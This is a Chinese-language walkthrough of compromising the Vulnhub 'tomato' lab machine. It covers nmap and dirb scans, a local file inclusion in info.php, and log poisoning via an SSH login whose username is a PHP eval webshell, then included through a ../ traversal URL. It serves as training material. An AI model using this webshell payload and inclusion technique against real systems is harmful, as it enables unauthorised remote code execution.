Vulnhub靶机tomato渗透(详细教程)

一、信息收集

1.主机发现

我们把虚拟机改为NAT模式,利用真实机的VMnet8 IP,将虚拟机的IP扫出来。

访问页面

2.主机扫描

这里使用的工具是Nmap来进行的主机扫描,使用命令如下:

nmap -A 192.168.222.133 -p-

如下图扫描结果,发现开放了21,80,2211,8888端口

3.目录扫描

既然开放了80端口,那么肯定要进行一次目录扫描,使用命令如下

dirb http://192.168.222.133

扫描结果如下,发现并没有多少东西,但是感觉第一个有东西

如下图访问目录antibot_image目录,如下图,发现了一堆东西

4.网页收集

其实经过搜索,看源代码,看网络,在

http://192.168.222.133/antibot_image/antibots/info.php

这个地址下面查看源代码发现了东西,如下图。

二、漏洞利用

1.文件包含漏洞

经过上面信息收集,我们发现antibot_image在这个目录下面有一堆东西,然后看代码include是包含,如下图经过测试发现拥有文件包含漏洞,这里的测试是读取/etc/passwd

在思考如何利用的时候,想到,可以尝试读取/var/log/auth.log这个文件,这个文件用处如下:

/var/ log / auth.log 这是一个文本文件,记录了所有和用户认证相关的 日志 。 无论是我们通过 ssh 登录,还是通过 sudo 执行命令都会在 auth.log 中产生记录。

接下来就可以在日志里面写入一句话木马了,如下图,使用ssh连接失败日志写入一句木马。

ssh ' <?php @eval($_POST[cmd]);?> '@192.168.222.133 -p 2211

然后我们使用蚁剑验证一下是否有数据连接,是否成功,如下图,发现是成功的,url地址是

http://192.168.94.30/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log

连接成功

                                                                                                                                          Meet.meet

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值